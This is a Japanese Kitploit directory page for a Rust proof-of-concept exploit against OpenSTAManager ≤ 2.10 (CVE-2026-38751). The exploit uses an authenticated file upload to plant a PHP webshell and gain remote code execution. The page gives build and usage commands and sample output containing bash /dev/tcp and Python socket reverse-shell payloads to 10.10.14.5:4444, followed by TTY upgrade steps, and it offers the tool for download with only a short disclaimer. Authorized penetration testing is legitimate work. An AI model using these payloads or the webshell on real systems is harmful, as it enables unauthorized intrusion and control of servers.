Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
OpenSTAManager-RCE-Exploit-CVE-2026-38751 — OpenSTAManager-RCE-Exploit-CVE-2026-38751 | Kitploit
ツール/GitHubGitHub/b0ysie7e/openstamanager-rce-exploit-cve-2026-38751
脆弱性分析エクスプロイトシェルコードウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミングペイロード開発

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
b0ysie7e/openstamanager-rce-exploit-cve-2026-38751

OpenSTAManager-RCE-Exploit-CVE-2026-38751

OpenSTAManager-RCE-Exploit-CVE-2026-38751

リポジトリを見る
81ヶ月前未レビュー

OpenSTAManager RCE Exploit (CVE-2026-38751)

任意ファイルアップロードによるリモートコード実行
CVE-2026-38751 向けのフル機能を備えた概念実証(PoC)で、Rust で記述されています。

警告: このツールは許可されたセキュリティテストおよび教育目的のみを対象としています。所有しているシステム、またはテストする明示的な許可を得たシステムでのみ使用してください。


説明

OpenSTAManager ≤ 2.10 には、認証済みの任意ファイルアップロードの脆弱性があり、攻撃者が PHP ウェブシェルを含む悪意のある ZIP アーカイブをアップロードできる可能性があります。この PoC は以下のプロセスを自動化します:

  • 有効な資格情報でログイン
  • ウェブシェルを含む悪意のあるモジュールをアップロード
  • 脆弱性を検証
  • 対話型ウェブシェル(コマンド実行)
  • TTY 処理を備えたリバースシェル(複数のペイロード)
  • アップロードしたバックドアのクリーンアップ

機能

機能説明
ログイン提供された資格情報を使用して認証します。
ZIP 生成有効な MODULE ディスクリプタと PHP シェルを含む ZIP ファイルを作成します。
ファイルアップロード更新メカニズムを介して悪意のある ZIP を送信します。
検証シェルに到達可能かどうかを確認し、テストコマンド(id)を実行します。
対話型ウェブシェルウェブシェルを通じてコマンドを対話的に実行できます(-i)。
リバースシェルシェルを取得するために複数のペイロード(bash、python、base64、nc、mkfifo)を送信します。
TTY アップグレード手順完全に対話型の TTY を取得するためのステップバイステップガイドを表示します。
クリーンアップアップロードした shell.php を自動的に削除します(--no-cleanup を指定した場合を除く)。

🛠️ 必要条件

  • Rust (1.70+)
  • OpenSTAManager ≤ 2.10 を実行しているターゲット。
  • ログインするための有効なユーザーアカウント(パスワード付き)。

インストール

リポジトリをクローンしてバイナリをビルドします:

root@kitploit:~
git clone https://github.com/yourusername/OpenSTAManager-RCE-Exploit-CVE-2026-38751
cd OpenSTAManager-RCE-Exploit-CVE-2026-38751
cargo build --release
./target/release/openstamanager-rce-exploit --help

使用例:

root@kitploit:~
$ ./openstamanager-rce-exploit --url http://target.com/ -U <user> -P <password> --lhost 10.10.14.5 --lport 4444

[ OpenSTAManager RCE Exploit : ]

Target: http://target.com/
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 500 Internal Server Error
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami
[*] Listening on 10.10.14.5:4444...
[*] Trying payload: bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
[-] Payload failed: operation timed out
[*] Trying payload: python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
[-] Payload failed: operation timed out
[*] Trying payload: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
[+] Payload sent successfully. Waiting for connection...
[+] Connection received from 10.129.19.238:55758
[*] Sent 'script /dev/null -c bash'

[*]
[*] Reverse shell established.
[*] To get a fully interactive TTY:
[*] 1. Press Ctrl+Z to suspend the shell.
[*] 2. Run: stty raw -echo; fg
[*] 3. When prompted for terminal type, type: xterm
[*] 4. Export: export TERM=xterm SHELL=bash
[*] 5. Adjust rows/columns with: stty rows <rows> columns <cols>
[*]    (Get the size with: stty size)
[*]
[*] Press Ctrl+C to exit and cleanup the webshell.

bash: cannot set terminal process group (1481): Inappropriate ioctl for device
bash: no job control in this shell
www-data@target:~/html/openstamanager/modules/shell$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@target:~/html/openstamanager/modules/shell$ whoami
whoami
www-data
www-data@target:~/html/openstamanager/modules/shell$
ツールをダウンロード